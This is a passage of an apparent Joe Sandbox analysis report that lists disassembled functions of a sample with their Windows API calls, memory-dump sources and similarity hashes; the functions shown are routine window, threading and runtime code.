                                                            • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                            Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                            • GetStockObject.GDI32(00000011), ref: 00430258
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                            • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateMessageObjectSendShowStock
                                                            • String ID:
                                                            • API String ID: 1358664141-0
                                                            • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                            • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                            • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                            Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                            • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                            • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                            • String ID:
                                                            • API String ID: 2880819207-0
                                                            • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                            • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                            • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                            Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                            • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                            • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                            • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                            • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                            • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                            Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __wsplitpath.LIBCMT ref: 0043392E
                                                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                            • __wsplitpath.LIBCMT ref: 00433950
                                                            • __wcsicoll.LIBCMT ref: 00433974
                                                            • __wcsicoll.LIBCMT ref: 0043398A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                            • String ID:
                                                            • API String ID: 1187119602-0
                                                            • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                            • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                            • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                            • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                            Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                            • String ID:
                                                            • API String ID: 1597257046-0
                                                            • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                            • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                            • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                            • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                            Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                            • __malloc_crt.LIBCMT ref: 0041F5B6
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: EnvironmentStrings$Free__malloc_crt
                                                            • String ID:
                                                            • API String ID: 237123855-0
                                                            • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                            • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                            • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                            • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                            Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: DeleteDestroyObject$IconWindow
                                                            • String ID:
                                                            • API String ID: 3349847261-0
                                                            • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                            • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                            • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                            • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                            Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                            • String ID:
                                                            • API String ID: 2223660684-0
                                                            • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                            • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                            • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                            • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                            Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                            • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                            • LineTo.GDI32(?,?,?), ref: 00447326
                                                            • EndPath.GDI32(?), ref: 00447336
                                                            • StrokePath.GDI32(?), ref: 00447344
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                            • String ID:
                                                            • API String ID: 2783949968-0
                                                            • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                            • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                            • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                            • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                            Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                            • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                            • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                            • String ID:
                                                            • API String ID: 2710830443-0
                                                            • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                            • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                            • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                            • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                            Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                            • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                            • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                              • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                              • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                            • String ID:
                                                            • API String ID: 146765662-0
                                                            • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                            • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                            • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                            • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                            Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00472B63
                                                            • GetDC.USER32(00000000), ref: 00472B6C
                                                            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                            • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                            • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                            • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                            • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                            Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDesktopWindow.USER32 ref: 00472BB2
                                                            • GetDC.USER32(00000000), ref: 00472BBB
                                                            • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                            • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CapsDesktopDeviceReleaseWindow
                                                            • String ID:
                                                            • API String ID: 2889604237-0
                                                            • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                            • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                            • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                            • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                            Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __getptd_noexit.LIBCMT ref: 00415150
                                                              • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                              • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                              • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                              • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                              • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                            • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                            • __freeptd.LIBCMT ref: 0041516B
                                                            • ExitThread.KERNEL32 ref: 00415173
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                            • String ID:
                                                            • API String ID: 1454798553-0
                                                            • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                            • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                            • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                            Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                                            Download Yara Rule
